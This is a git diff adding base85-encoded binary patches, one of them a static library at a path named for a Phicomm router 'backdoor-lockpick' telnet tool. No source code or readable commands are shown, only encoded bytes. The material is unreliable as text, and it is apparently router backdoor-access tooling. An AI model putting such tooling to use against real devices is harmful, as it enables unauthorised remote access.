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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/lib/libtelnet.a b/Phicomm/backdoor-lockpick_tra-2022-01/lib/libtelnet.a
new file mode 100644
index 0000000000000000000000000000000000000000..613e87ae13080d45cc7d9660ce575e7fcba8109e
GIT binary patch
literal 22520
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
